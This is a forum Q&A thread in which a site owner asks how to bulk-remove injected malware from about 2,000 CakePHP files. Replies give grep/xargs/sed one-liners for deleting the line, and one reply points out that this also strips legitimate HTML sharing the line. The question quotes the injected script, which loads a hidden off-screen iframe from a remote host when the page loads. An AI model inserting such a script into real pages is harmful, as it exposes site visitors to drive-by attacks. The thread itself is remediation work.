Need to delete the virus code in cakephp script using the linux command
Question
Yesterday my site was hacked and it has the code like:
<script>
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = \"http://fenwaywest.com/media/index.php\";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
</script>";
When I search the server using the below command to find the affected files
grep -r "<script> function frmAdd()" /path/
I got more than 2000 files.
Now I need to remove that line only. Please, someone can you guide the command only to remove that line in all 2000 files?
Solution
Back up first! Then, you might try something like this:
grep -lr " function frmAdd" /path/ | xargs sed -i '/ function frmAdd/d'
This will delete any line matching that regex. It also assumes the path does not contain spaces (hopefully a reasonable assumption here).
OTHER TIPS
Try to use the CakePHP sanitize Class when printing a user data:
echo Sanitize::html($badString);
Do you have any lack cleaning the virus? Because I got the same virus. My site in in joomla.
EDIT:
I use the code:
grep -lr " function frmAdd" public_html | xargs sed -i '/ function frmAdd/d'
but if you have something like this
<html><body bgcolor="#FFFFFF"><!--ef09d2--><script> function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://fenwaywest.com/media/index.php";ifrm.id = 'frmId';document.body.appendChild(ifrm);};window.onload = frmAdd;</script><!--/ef09d2-->
</body></html>
this will return only </body></html>